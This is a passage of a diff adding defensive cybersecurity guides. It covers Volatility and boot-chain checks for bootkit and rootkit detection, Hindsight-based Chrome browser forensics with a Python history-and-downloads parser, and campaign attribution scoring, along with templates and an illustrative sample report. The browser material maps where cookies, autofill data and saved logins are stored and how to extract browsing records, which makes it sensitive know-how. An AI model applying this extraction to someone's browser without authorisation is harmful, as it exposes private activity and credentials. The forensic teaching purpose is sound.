# Kernel callback registration (rootkits register callbacks for filtering)
|
||||
vol3 -f memory.dmp windows.callbacks
|
||||
|
||||
# Driver analysis
|
||||
vol3 -f memory.dmp windows.driverscan
|
||||
vol3 -f memory.dmp windows.modules
|
||||
|
||||
# Check for unsigned drivers
|
||||
vol3 -f memory.dmp windows.driverscan | while read line; do
|
||||
driver_path=$(echo "$line" | awk '{print $NF}')
|
||||
if [ -f "$driver_path" ]; then
|
||||
sigcheck -nobanner "$driver_path" 2>/dev/null | grep "Unsigned"
|
||||
fi
|
||||
done
|
||||
|
||||
# IDT hook detection
|
||||
vol3 -f memory.dmp windows.idt
|
||||
```
|
||||
|
||||
### Step 5: Boot Process Integrity Verification
|
||||
|
||||
Verify the integrity of the entire boot chain:
|
||||
|
||||
```bash
|
||||
# Verify Windows Boot Manager signature
|
||||
sigcheck -a C:\Windows\Boot\EFI\bootmgfw.efi
|
||||
|
||||
# Verify winload.efi
|
||||
sigcheck -a C:\Windows\System32\winload.efi
|
||||
|
||||
# Verify ntoskrnl.exe
|
||||
sigcheck -a C:\Windows\System32\ntoskrnl.exe
|
||||
|
||||
# Check Measured Boot logs (if TPM is available)
|
||||
# Windows: BCDEdit /enum firmware
|
||||
bcdedit /enum firmware
|
||||
|
||||
# Verify Secure Boot state
|
||||
Confirm-SecureBootUEFI # PowerShell cmdlet
|
||||
|
||||
# Check boot configuration for tampering
|
||||
bcdedit /v
|
||||
|
||||
# Look for boot configuration changes
|
||||
# testsigning: should be No
|
||||
# nointegritychecks: should be No
|
||||
# debug: should be No
|
||||
bcdedit | findstr /i "testsigning nointegritychecks debug"
|
||||
```
|
||||
|
||||
### Step 6: Document Bootkit/Rootkit Analysis
|
||||
|
||||
Compile comprehensive analysis findings:
|
||||
|
||||
```
|
||||
Analysis should document:
|
||||
- Boot sector (MBR/VBR) integrity status with hex comparison
|
||||
- UEFI firmware module inventory and integrity verification
|
||||
- Secure Boot status and any bypass mechanisms detected
|
||||
- Kernel-level hooks (SSDT, IDT, IRP, inline) identified
|
||||
- Hidden processes, drivers, and files discovered
|
||||
- Persistence mechanism (SPI flash, ESP, MBR, kernel driver)
|
||||
- Boot chain integrity verification results
|
||||
- Attribution to known bootkit families if possible
|
||||
- Remediation steps (reflash firmware, rebuild MBR, replace hardware)
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Bootkit** | Malware that infects the boot process (MBR, VBR, UEFI) to execute before the operating system loads, gaining persistent low-level control |
|
||||
| **MBR (Master Boot Record)** | First 512 bytes of a disk containing bootstrap code and partition table; MBR bootkits replace this code with malicious loaders |
|
||||
| **UEFI (Unified Extensible Firmware Interface)** | Modern firmware interface replacing BIOS; UEFI bootkits implant malicious modules in firmware volumes or modify the ESP |
|
||||
| **Secure Boot** | UEFI security feature verifying digital signatures of boot components; bootkits like BlackLotus exploit vulnerabilities to bypass it |
|
||||
| **SPI Flash** | Flash memory chip storing UEFI firmware; advanced bootkits like LoJax and MoonBounce modify SPI flash for firmware-level persistence |
|
||||
| **DKOM (Direct Kernel Object Manipulation)** | Rootkit technique modifying kernel structures to hide processes, files, and network connections without hooking functions |
|
||||
| **Driver Signature Enforcement (DSE)** | Windows security feature requiring kernel drivers to be digitally signed; bootkits disable DSE during boot to load unsigned rootkit drivers |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **UEFITool**: Open-source UEFI firmware image editor and parser for inspecting firmware volumes, drivers, and modules
|
||||
- **chipsec**: Intel hardware security assessment framework for verifying SPI flash protection, Secure Boot, and UEFI configuration
|
||||
- **Volatility**: Memory forensics framework with SSDT, IDT, callback, and driver analysis plugins for kernel rootkit detection
|
||||
- **GMER**: Windows rootkit detection tool scanning for SSDT hooks, IDT hooks, hidden processes, and modified kernel modules
|
||||
- **Bootkits Analyzer**: Specialized tool for analyzing MBR/VBR code including disassembly and comparison against known-good baselines
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Investigating Persistent Compromise Surviving OS Reinstallation
|
||||
|
||||
**Context**: An organization reimaged a compromised workstation, but the same C2 beaconing resumed within hours. Standard disk forensics finds no malware. UEFI bootkit is suspected.
|
||||
|
||||
**Approach**:
|
||||
1. Boot from a Linux live USB to avoid executing any compromised OS components
|
||||
2. Dump the SPI flash firmware using chipsec or flashrom for offline analysis
|
||||
3. Dump the MBR and VBR sectors with dd for boot sector analysis
|
||||
4. Copy the EFI System Partition for bootloader integrity verification
|
||||
5. Open the SPI dump in UEFITool and compare module GUIDs against vendor-provided firmware
|
||||
6. Look for additional or modified DXE drivers that should not be present
|
||||
7. Analyze any suspicious modules with Ghidra (x86_64 UEFI module format)
|
||||
8. Verify Secure Boot configuration and check for exploit-based bypasses
|
||||
|
||||
**Pitfalls**:
|
||||
- Analyzing the system while the compromised OS is running (rootkit may hide from live analysis)
|
||||
- Not checking SPI flash (only analyzing disk-based boot components misses firmware-level implants)
|
||||
- Assuming Secure Boot prevents all bootkits (known bypasses exist, e.g., CVE-2022-21894)
|
||||
- Not preserving the original firmware dump before reflashing (critical evidence for attribution)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
BOOTKIT / ROOTKIT ANALYSIS REPORT
|
||||
====================================
|
||||
System: Dell OptiPlex 7090 (UEFI, TPM 2.0)
|
||||
Firmware Version: 1.15.0 (Dell)
|
||||
Secure Boot: ENABLED (but bypassed)
|
||||
Capture Method: Linux Live USB + chipsec SPI dump
|
||||
|
||||
MBR/VBR ANALYSIS
|
||||
MBR Signature: Valid (0x55AA)
|
||||
MBR Code: MATCHES standard Windows 10 MBR (clean)
|
||||
VBR Code: MATCHES standard NTFS VBR (clean)
|
||||
|
||||
UEFI FIRMWARE ANALYSIS
|
||||
Total Modules: 287
|
||||
Vendor Expected: 285
|
||||
Extra Modules: 2 UNAUTHORIZED
|
||||
[!] DXE Driver GUID: {ABCD1234-...} "SmmAccessDxe_mod" (MODIFIED)
|
||||
Original Size: 12,288 bytes
|
||||
Current Size: 45,056 bytes (32KB ADDED)
|
||||
Entropy: 7.82 (HIGH - encrypted payload)
|
||||
|
||||
[!] DXE Driver GUID: {EFGH5678-...} "UefiPayloadDxe" (NEW - not in vendor firmware)
|
||||
Size: 28,672 bytes
|
||||
Function: Drops persistence agent during boot
|
||||
|
||||
BOOT CHAIN INTEGRITY
|
||||
bootmgfw.efi: MODIFIED (hash mismatch, Secure Boot bypass via CVE-2022-21894)
|
||||
winload.efi: MODIFIED (DSE disabled at load time)
|
||||
ntoskrnl.exe: CLEAN (but unsigned driver loaded after boot)
|
||||
|
||||
KERNEL ROOTKIT COMPONENTS
|
||||
Driver: C:\Windows\System32\drivers\null_mod.sys (unsigned, hidden)
|
||||
SSDT Hooks: 3 (NtQuerySystemInformation, NtQueryDirectoryFile, NtDeviceIoControlFile)
|
||||
Hidden Processes: 2 (PID 6784: beacon.exe, PID 6812: keylog.exe)
|
||||
Hidden Files: C:\Windows\System32\drivers\null_mod.sys
|
||||
|
||||
ATTRIBUTION
|
||||
Family: BlackLotus variant
|
||||
Confidence: HIGH (CVE-2022-21894 exploit, ESP modification pattern matches)
|
||||
|
||||
REMEDIATION
|
||||
1. Reflash SPI firmware with clean vendor image via hardware programmer
|
||||
2. Rebuild EFI System Partition from clean Windows installation media
|
||||
3. Reinstall OS from verified media
|
||||
4. Enable all firmware write protections
|
||||
5. Update firmware to latest version (patches CVE-2022-21894)
|
||||
```
|
||||
@@ -0,0 +1,215 @@
|
||||
---
|
||||
name: analyzing-browser-forensics-with-hindsight
|
||||
description: Analyze Chromium-based browser artifacts using Hindsight to extract browsing history, downloads, cookies, cached content, autofill data, saved passwords, and browser extensions from Chrome, Edge, Brave, and Opera for forensic investigation.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [browser-forensics, hindsight, chrome-forensics, chromium, edge, browsing-history, cookies, downloads, cache, web-artifacts]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Browser Forensics with Hindsight
|
||||
|
||||
## Overview
|
||||
|
||||
Hindsight is an open-source browser forensics tool designed to parse artifacts from Google Chrome and other Chromium-based browsers (Microsoft Edge, Brave, Opera, Vivaldi). It extracts and correlates data from multiple browser database files to create a unified timeline of web activity. Hindsight can parse URLs, download history, cache records, bookmarks, autofill records, saved passwords, preferences, browser extensions, HTTP cookies, Local Storage (HTML5 cookies), login data, and session/tab information. The tool produces chronological timelines in multiple output formats (XLSX, JSON, SQLite) that enable investigators to reconstruct user web activity for incident response, insider threat investigations, and criminal cases.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.8+ with Hindsight installed (`pip install pyhindsight`)
|
||||
- Access to browser profile directories from forensic image
|
||||
- Browser profile data (not encrypted with OS-level encryption)
|
||||
- Timeline Explorer or spreadsheet application for analysis
|
||||
|
||||
## Browser Profile Locations
|
||||
|
||||
| Browser | Windows Profile Path |
|
||||
|---------|---------------------|
|
||||
| Chrome | %LOCALAPPDATA%\Google\Chrome\User Data\Default\ |
|
||||
| Edge | %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\ |
|
||||
| Brave | %LOCALAPPDATA%\BraveSoftware\Brave-Browser\User Data\Default\ |
|
||||
| Opera | %APPDATA%\Opera Software\Opera Stable\ |
|
||||
| Vivaldi | %LOCALAPPDATA%\Vivaldi\User Data\Default\ |
|
||||
| Chrome (macOS) | ~/Library/Application Support/Google/Chrome/Default/ |
|
||||
| Chrome (Linux) | ~/.config/google-chrome/Default/ |
|
||||
|
||||
## Key Artifact Files
|
||||
|
||||
| File | Contents |
|
||||
|------|----------|
|
||||
| History | URL visits, downloads, keyword searches |
|
||||
| Cookies | HTTP cookies with domain, expiry, values |
|
||||
| Web Data | Autofill entries, saved credit cards |
|
||||
| Login Data | Saved usernames/passwords (encrypted) |
|
||||
| Bookmarks | JSON bookmark tree |
|
||||
| Preferences | Browser configuration and extensions |
|
||||
| Local Storage/ | HTML5 Local Storage per domain |
|
||||
| Session Storage/ | Session-specific storage per domain |
|
||||
| Network Action Predictor | Previously typed URLs |
|
||||
| Shortcuts | Omnibox shortcuts and predictions |
|
||||
| Top Sites | Frequently visited sites |
|
||||
|
||||
## Running Hindsight
|
||||
|
||||
### Command Line
|
||||
|
||||
```bash
|
||||
# Basic analysis of a Chrome profile
|
||||
hindsight.exe -i "C:\Evidence\Users\suspect\AppData\Local\Google\Chrome\User Data\Default" -o C:\Output\chrome_analysis
|
||||
|
||||
# Specify browser type
|
||||
hindsight.exe -i "/path/to/profile" -o /output/analysis -b Chrome
|
||||
|
||||
# JSON output format
|
||||
hindsight.exe -i "C:\Evidence\Chrome\Default" -o C:\Output\chrome --format jsonl
|
||||
|
||||
# With cache parsing (slower but more complete)
|
||||
hindsight.exe -i "C:\Evidence\Chrome\Default" -o C:\Output\chrome --cache
|
||||
```
|
||||
|
||||
### Web UI
|
||||
|
||||
```bash
|
||||
# Start Hindsight web interface
|
||||
hindsight_gui.exe
|
||||
# Navigate to http://localhost:8080
|
||||
# Upload or point to browser profile directory
|
||||
# Configure output format and analysis options
|
||||
# Generate and download report
|
||||
```
|
||||
|
||||
## Artifact Analysis Details
|
||||
|
||||
### URL History and Visits
|
||||
|
||||
```sql
|
||||
-- Chrome History database schema (key tables)
|
||||
-- urls table: id, url, title, visit_count, typed_count, last_visit_time
|
||||
-- visits table: id, url, visit_time, from_visit, transition, segment_id
|
||||
|
||||
-- Timestamps are Chrome/WebKit format: microseconds since 1601-01-01
|
||||
-- Convert: datetime((visit_time/1000000)-11644473600, 'unixepoch')
|
||||
```
|
||||
|
||||
### Download History
|
||||
|
||||
```sql
|
||||
-- downloads table: id, current_path, target_path, start_time, end_time,
|
||||
-- received_bytes, total_bytes, state, danger_type, interrupt_reason,
|
||||
-- url, referrer, tab_url, mime_type, original_mime_type
|
||||
```
|
||||
|
||||
### Cookie Analysis
|
||||
|
||||
```sql
|
||||
-- cookies table: creation_utc, host_key, name, value, encrypted_value,
|
||||
-- path, expires_utc, is_secure, is_httponly, last_access_utc,
|
||||
-- has_expires, is_persistent, priority, samesite
|
||||
```
|
||||
|
||||
## Python Analysis Script
|
||||
|
||||
```python
|
||||
import sqlite3
|
||||
import os
|
||||
import json
|
||||
import sys
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
|
||||
CHROME_EPOCH = datetime(1601, 1, 1)
|
||||
|
||||
|
||||
def chrome_time_to_datetime(chrome_ts: int):
|
||||
"""Convert Chrome timestamp to datetime."""
|
||||
if chrome_ts == 0:
|
||||
return None
|
||||
try:
|
||||
return CHROME_EPOCH + timedelta(microseconds=chrome_ts)
|
||||
except (OverflowError, OSError):
|
||||
return None
|
||||
|
||||
|
||||
def analyze_chrome_history(profile_path: str, output_dir: str) -> dict:
|
||||
"""Analyze Chrome History database for forensic evidence."""
|
||||
history_db = os.path.join(profile_path, "History")
|
||||
if not os.path.exists(history_db):
|
||||
return {"error": "History database not found"}
|
||||
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
conn = sqlite3.connect(f"file:{history_db}?mode=ro", uri=True)
|
||||
|
||||
# URL visits with timestamps
|
||||
cursor = conn.cursor()
|
||||
cursor.execute("""
|
||||
SELECT u.url, u.title, v.visit_time, u.visit_count,
|
||||
v.transition & 0xFF as transition_type
|
||||
FROM visits v JOIN urls u ON v.url = u.id
|
||||
ORDER BY v.visit_time DESC LIMIT 5000
|
||||
""")
|
||||
visits = [{
|
||||
"url": r[0], "title": r[1],
|
||||
"visit_time": str(chrome_time_to_datetime(r[2])),
|
||||
"total_visits": r[3], "transition": r[4]
|
||||
} for r in cursor.fetchall()]
|
||||
|
||||
# Downloads
|
||||
cursor.execute("""
|
||||
SELECT target_path, tab_url, start_time, end_time,
|
||||
received_bytes, total_bytes, mime_type, state
|
||||
FROM downloads ORDER BY start_time DESC LIMIT 1000
|
||||
""")
|
||||
downloads = [{
|
||||
"path": r[0], "source_url": r[1],
|
||||
"start_time": str(chrome_time_to_datetime(r[2])),
|
||||
"end_time": str(chrome_time_to_datetime(r[3])),
|
||||
"received_bytes": r[4], "total_bytes": r[5],
|
||||
"mime_type": r[6], "state": r[7]
|
||||
} for r in cursor.fetchall()]
|
||||
|
||||
# Keyword searches
|
||||
cursor.execute("""
|
||||
SELECT k.term, u.url, k.url_id
|
||||
FROM keyword_search_terms k JOIN urls u ON k.url_id = u.id
|
||||
ORDER BY u.last_visit_time DESC LIMIT 1000
|
||||
""")
|
||||
searches = [{"term": r[0], "url": r[1]} for r in cursor.fetchall()]
|
||||
|
||||
conn.close()
|
||||
|
||||
report = {
|
||||
"analysis_timestamp": datetime.now().isoformat(),
|
||||
"profile_path": profile_path,
|
||||
"total_visits": len(visits),
|
||||
"total_downloads": len(downloads),
|
||||
"total_searches": len(searches),
|
||||
"visits": visits,
|
||||
"downloads": downloads,
|
||||
"searches": searches
|
||||
}
|
||||
|
||||
report_path = os.path.join(output_dir, "browser_forensics.json")
|
||||
with open(report_path, "w") as f:
|
||||
json.dump(report, f, indent=2)
|
||||
|
||||
return report
|
||||
|
||||
|
||||
def main():
|
||||
if len(sys.argv) < 3:
|
||||
print("Usage: python process.py <chrome_profile_path> <output_dir>")
|
||||
sys.exit(1)
|
||||
analyze_chrome_history(sys.argv[1], sys.argv[2])
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- Hindsight GitHub: https://github.com/obsidianforensics/hindsight
|
||||
- Chrome Forensics Guide: https://allenace.medium.com/hindsight-chrome-forensics-made-simple-425db99fa5ed
|
||||
- Browser Forensics Tools: https://www.cyberforensicacademy.com/blog/browser-forensics-tools-how-to-extract-user-activity
|
||||
- Chromium Source (History): https://source.chromium.org/chromium/chromium/src/+/main:components/history/
|
||||
@@ -0,0 +1,22 @@
|
||||
# Browser Forensics Report
|
||||
## Case Info
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| Case Number | |
|
||||
| Browser | |
|
||||
| Profile Path | |
|
||||
## Activity Summary
|
||||
| Metric | Count |
|
||||
|--------|-------|
|
||||
| URL Visits | |
|
||||
| Downloads | |
|
||||
| Saved Passwords | |
|
||||
| Cookies | |
|
||||
## Notable URLs
|
||||
| Timestamp | URL | Title |
|
||||
|-----------|-----|-------|
|
||||
| | | |
|
||||
## Downloads
|
||||
| Timestamp | File | Source URL | Size |
|
||||
|-----------|------|-----------|------|
|
||||
| | | | |
|
||||
@@ -0,0 +1,15 @@
|
||||
# Standards - Browser Forensics with Hindsight
|
||||
## Tools
|
||||
- Hindsight: https://github.com/obsidianforensics/hindsight
|
||||
- DB Browser for SQLite: Chrome database inspection
|
||||
- ChromeCacheView (NirSoft): Cache analysis
|
||||
## Browser Databases
|
||||
- History: URL visits, downloads, keyword searches
|
||||
- Cookies: HTTP cookies per domain
|
||||
- Web Data: Autofill, credit cards
|
||||
- Login Data: Saved credentials (encrypted)
|
||||
- Bookmarks: JSON bookmark tree
|
||||
## Timestamp Formats
|
||||
- Chrome/WebKit: microseconds since 1601-01-01 UTC
|
||||
- Firefox/Mozilla: microseconds since Unix epoch
|
||||
- Safari/Mac: seconds since 2001-01-01 UTC
|
||||
@@ -0,0 +1,19 @@
|
||||
# Workflows - Browser Forensics
|
||||
## Workflow: Chrome Profile Analysis
|
||||
```
|
||||
Locate browser profile directory
|
||||
|
|
||||
Run Hindsight against profile path
|
||||
|
|
||||
Review generated timeline (XLSX/JSON)
|
||||
|
|
||||
Analyze URL history for suspicious sites
|
||||
|
|
||||
Check downloads for malware/exfiltrated data
|
||||
|
|
||||
Review cookies for session hijacking evidence
|
||||
|
|
||||
Examine autofill and saved credentials
|
||||
|
|
||||
Correlate browser activity with system timeline
|
||||
```
|
||||
@@ -0,0 +1,31 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Browser Forensics Analyzer - Parses Chrome History SQLite for investigation."""
|
||||
import sqlite3, json, os, sys
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
CHROME_EPOCH = datetime(1601, 1, 1)
|
||||
|
||||
def chrome_ts(ts):
|
||||
if not ts: return None
|
||||
try: return str(CHROME_EPOCH + timedelta(microseconds=ts))
|
||||
except: return None
|
||||
|
||||
def analyze_chrome(profile: str, output_dir: str) -> str:
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
history_db = os.path.join(profile, "History")
|
||||
conn = sqlite3.connect(f"file:{history_db}?mode=ro", uri=True)
|
||||
c = conn.cursor()
|
||||
c.execute("SELECT u.url, u.title, v.visit_time, u.visit_count FROM visits v JOIN urls u ON v.url=u.id ORDER BY v.visit_time DESC LIMIT 2000")
|
||||
visits = [{"url": r[0], "title": r[1], "time": chrome_ts(r[2]), "count": r[3]} for r in c.fetchall()]
|
||||
c.execute("SELECT target_path, tab_url, start_time, total_bytes, mime_type FROM downloads ORDER BY start_time DESC LIMIT 500")
|
||||
downloads = [{"path": r[0], "url": r[1], "time": chrome_ts(r[2]), "size": r[3], "mime": r[4]} for r in c.fetchall()]
|
||||
conn.close()
|
||||
report = {"visits": len(visits), "downloads": len(downloads), "visit_data": visits, "download_data": downloads}
|
||||
out = os.path.join(output_dir, "browser_forensics.json")
|
||||
with open(out, "w") as f: json.dump(report, f, indent=2)
|
||||
print(f"[*] Visits: {len(visits)}, Downloads: {len(downloads)}")
|
||||
return out
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 3: print("Usage: process.py <chrome_profile> <output>"); sys.exit(1)
|
||||
analyze_chrome(sys.argv[1], sys.argv[2])
|
||||
@@ -0,0 +1,216 @@
|
||||
---
|
||||
name: None
|
||||
description: Campaign attribution analysis involves systematically evaluating evidence to determine which threat actor or group is responsible for a cyber operation. This skill covers collecting and weighting attr
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [threat-intelligence, cti, ioc, mitre-attack, stix, attribution, campaign-analysis]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Campaign Attribution Evidence
|
||||
|
||||
## Overview
|
||||
|
||||
Campaign attribution analysis involves systematically evaluating evidence to determine which threat actor or group is responsible for a cyber operation. This skill covers collecting and weighting attribution indicators using the Diamond Model and ACH (Analysis of Competing Hypotheses), analyzing infrastructure overlaps, TTP consistency, malware code similarities, operational timing patterns, and language artifacts to build confidence-weighted attribution assessments.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `attackcti`, `stix2`, `networkx` libraries
|
||||
- Access to threat intelligence platforms (MISP, OpenCTI)
|
||||
- Understanding of Diamond Model of Intrusion Analysis
|
||||
- Familiarity with MITRE ATT&CK threat group profiles
|
||||
- Knowledge of malware analysis and infrastructure tracking techniques
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Attribution Evidence Categories
|
||||
1. **Infrastructure Overlap**: Shared C2 servers, domains, IP ranges, hosting providers
|
||||
2. **TTP Consistency**: Matching ATT&CK techniques and sub-techniques across campaigns
|
||||
3. **Malware Code Similarity**: Shared code bases, compilers, PDB paths, encryption routines
|
||||
4. **Operational Patterns**: Timing (working hours, time zones), targeting patterns, operational tempo
|
||||
5. **Language Artifacts**: Embedded strings, variable names, error messages in specific languages
|
||||
6. **Victimology**: Target sector, geography, and organizational profile consistency
|
||||
|
||||
### Confidence Levels
|
||||
- **High Confidence**: Multiple independent evidence categories converge on same actor
|
||||
- **Moderate Confidence**: Several evidence categories match, some ambiguity remains
|
||||
- **Low Confidence**: Limited evidence, possible false flags or shared tooling
|
||||
|
||||
### Analysis of Competing Hypotheses (ACH)
|
||||
Structured analytical method that evaluates evidence against multiple competing hypotheses. Each piece of evidence is scored as consistent, inconsistent, or neutral with respect to each hypothesis. The hypothesis with the least inconsistent evidence is favored.
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Collect Attribution Evidence
|
||||
|
||||
```python
|
||||
from stix2 import MemoryStore, Filter
|
||||
from collections import defaultdict
|
||||
|
||||
class AttributionAnalyzer:
|
||||
def __init__(self):
|
||||
self.evidence = []
|
||||
self.hypotheses = {}
|
||||
|
||||
def add_evidence(self, category, description, value, confidence):
|
||||
self.evidence.append({
|
||||
"category": category,
|
||||
"description": description,
|
||||
"value": value,
|
||||
"confidence": confidence,
|
||||
"timestamp": None,
|
||||
})
|
||||
|
||||
def add_hypothesis(self, actor_name, actor_id=""):
|
||||
self.hypotheses[actor_name] = {
|
||||
"actor_id": actor_id,
|
||||
"consistent_evidence": [],
|
||||
"inconsistent_evidence": [],
|
||||
"neutral_evidence": [],
|
||||
"score": 0,
|
||||
}
|
||||
|
||||
def evaluate_evidence(self, evidence_idx, actor_name, assessment):
|
||||
"""Assess evidence against a hypothesis: consistent/inconsistent/neutral."""
|
||||
if assessment == "consistent":
|
||||
self.hypotheses[actor_name]["consistent_evidence"].append(evidence_idx)
|
||||
self.hypotheses[actor_name]["score"] += self.evidence[evidence_idx]["confidence"]
|
||||
elif assessment == "inconsistent":
|
||||
self.hypotheses[actor_name]["inconsistent_evidence"].append(evidence_idx)
|
||||
self.hypotheses[actor_name]["score"] -= self.evidence[evidence_idx]["confidence"] * 2
|
||||
else:
|
||||
self.hypotheses[actor_name]["neutral_evidence"].append(evidence_idx)
|
||||
|
||||
def rank_hypotheses(self):
|
||||
"""Rank hypotheses by attribution score."""
|
||||
ranked = sorted(
|
||||
self.hypotheses.items(),
|
||||
key=lambda x: x[1]["score"],
|
||||
reverse=True,
|
||||
)
|
||||
return [
|
||||
{
|
||||
"actor": name,
|
||||
"score": data["score"],
|
||||
"consistent": len(data["consistent_evidence"]),
|
||||
"inconsistent": len(data["inconsistent_evidence"]),
|
||||
"confidence": self._score_to_confidence(data["score"]),
|
||||
}
|
||||
for name, data in ranked
|
||||
]
|
||||
|
||||
def _score_to_confidence(self, score):
|
||||
if score >= 80:
|
||||
return "HIGH"
|
||||
elif score >= 40:
|
||||
return "MODERATE"
|
||||
else:
|
||||
return "LOW"
|
||||
```
|
||||
|
||||
### Step 2: Infrastructure Overlap Analysis
|
||||
|
||||
```python
|
||||
def analyze_infrastructure_overlap(campaign_a_infra, campaign_b_infra):
|
||||
"""Compare infrastructure between two campaigns for attribution."""
|
||||
overlap = {
|
||||
"shared_ips": set(campaign_a_infra.get("ips", [])).intersection(
|
||||
campaign_b_infra.get("ips", [])
|
||||
),
|
||||
"shared_domains": set(campaign_a_infra.get("domains", [])).intersection(
|
||||
campaign_b_infra.get("domains", [])
|
||||
),
|
||||
"shared_asns": set(campaign_a_infra.get("asns", [])).intersection(
|
||||
campaign_b_infra.get("asns", [])
|
||||
),
|
||||
"shared_registrars": set(campaign_a_infra.get("registrars", [])).intersection(
|
||||
campaign_b_infra.get("registrars", [])
|
||||
),
|
||||
}
|
||||
|
||||
overlap_score = 0
|
||||
if overlap["shared_ips"]:
|
||||
overlap_score += 30
|
||||
if overlap["shared_domains"]:
|
||||
overlap_score += 25
|
||||
if overlap["shared_asns"]:
|
||||
overlap_score += 15
|
||||
if overlap["shared_registrars"]:
|
||||
overlap_score += 10
|
||||
|
||||
return {
|
||||
"overlap": {k: list(v) for k, v in overlap.items()},
|
||||
"overlap_score": overlap_score,
|
||||
"assessment": "STRONG" if overlap_score >= 40 else "MODERATE" if overlap_score >= 20 else "WEAK",
|
||||
}
|
||||
```
|
||||
|
||||
### Step 3: TTP Comparison Across Campaigns
|
||||
|
||||
```python
|
||||
from attackcti import attack_client
|
||||
|
||||
def compare_campaign_ttps(campaign_techniques, known_actor_techniques):
|
||||
"""Compare campaign TTPs against known threat actor profiles."""
|
||||
campaign_set = set(campaign_techniques)
|
||||
actor_set = set(known_actor_techniques)
|
||||
|
||||
common = campaign_set.intersection(actor_set)
|
||||
unique_campaign = campaign_set - actor_set
|
||||
unique_actor = actor_set - campaign_set
|
||||
|
||||
jaccard = len(common) / len(campaign_set.union(actor_set)) if campaign_set.union(actor_set) else 0
|
||||
|
||||
return {
|
||||
"common_techniques": sorted(common),
|
||||
"common_count": len(common),
|
||||
"unique_to_campaign": sorted(unique_campaign),
|
||||
"unique_to_actor": sorted(unique_actor),
|
||||
"jaccard_similarity": round(jaccard, 3),
|
||||
"overlap_percentage": round(len(common) / len(campaign_set) * 100, 1) if campaign_set else 0,
|
||||
}
|
||||
```
|
||||
|
||||
### Step 4: Generate Attribution Report
|
||||
|
||||
```python
|
||||
def generate_attribution_report(analyzer):
|
||||
"""Generate structured attribution assessment report."""
|
||||
rankings = analyzer.rank_hypotheses()
|
||||
|
||||
report = {
|
||||
"assessment_date": "2026-02-23",
|
||||
"total_evidence_items": len(analyzer.evidence),
|
||||
"hypotheses_evaluated": len(analyzer.hypotheses),
|
||||
"rankings": rankings,
|
||||
"primary_attribution": rankings[0] if rankings else None,
|
||||
"evidence_summary": [
|
||||
{
|
||||
"index": i,
|
||||
"category": e["category"],
|
||||
"description": e["description"],
|
||||
"confidence": e["confidence"],
|
||||
}
|
||||
for i, e in enumerate(analyzer.evidence)
|
||||
],
|
||||
}
|
||||
|
||||
return report
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Evidence collection covers all six attribution categories
|
||||
- ACH matrix properly evaluates evidence against competing hypotheses
|
||||
- Infrastructure overlap analysis identifies shared indicators
|
||||
- TTP comparison uses ATT&CK technique IDs for precision
|
||||
- Attribution confidence levels are properly justified
|
||||
- Report includes alternative hypotheses and false flag considerations
|
||||
|
||||
## References
|
||||
|
||||
- [Diamond Model of Intrusion Analysis](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf)
|
||||
- [MITRE ATT&CK Groups](https://attack.mitre.org/groups/)
|
||||
- [Analysis of Competing Hypotheses](https://www.cia.gov/static/9a5f1162fd0932c29e985f0159f56c07/Tradecraft-Primer-apr09.pdf)
|
||||
- [Threat Attribution Framework](https://www.mandiant.com/resources/reports)
|
||||
@@ -0,0 +1,39 @@
|
||||
# Campaign Attribution Analysis Report Template
|
||||
|
||||
## Report Metadata
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| Report ID | CTI-YYYY-NNNN |
|
||||
| Date | YYYY-MM-DD |
|
||||
| Classification | TLP:AMBER |
|
||||
| Analyst | [Name] |
|
||||
| Confidence | High/Moderate/Low |
|
||||
|
||||
## Executive Summary
|
||||
[Brief overview of key findings and their significance]
|
||||
|
||||
## Key Findings
|
||||
1. [Finding 1 with supporting evidence]
|
||||
2. [Finding 2 with supporting evidence]
|
||||
3. [Finding 3 with supporting evidence]
|
||||
|
||||
## Detailed Analysis
|
||||
### Finding 1
|
||||
- **Evidence**: [Description of evidence]
|
||||
- **Confidence**: High/Moderate/Low
|
||||
- **MITRE ATT&CK**: [Relevant technique IDs]
|
||||
- **Impact Assessment**: [Potential impact to organization]
|
||||
|
||||
## Indicators of Compromise
|
||||
| Type | Value | Context | Confidence |
|
||||
|------|-------|---------|-----------|
|
||||
| | | | |
|
||||
|
||||
## Recommendations
|
||||
1. **Immediate**: [Actions requiring immediate attention]
|
||||
2. **Short-term**: [Actions within 1-2 weeks]
|
||||
3. **Long-term**: [Strategic improvements]
|
||||
|
||||
## References
|
||||
- [Source 1]
|
||||
- [Source 2]
|
||||
@@ -0,0 +1,24 @@
|
||||
# Standards and Frameworks Reference
|
||||
|
||||
## Applicable Standards
|
||||
- **STIX 2.1**: Structured Threat Information eXpression for CTI data representation
|
||||
- **TAXII 2.1**: Transport protocol for sharing CTI over HTTPS
|
||||
- **MITRE ATT&CK**: Adversary tactics, techniques, and procedures taxonomy
|
||||
- **Diamond Model**: Intrusion analysis framework (Adversary, Capability, Infrastructure, Victim)
|
||||
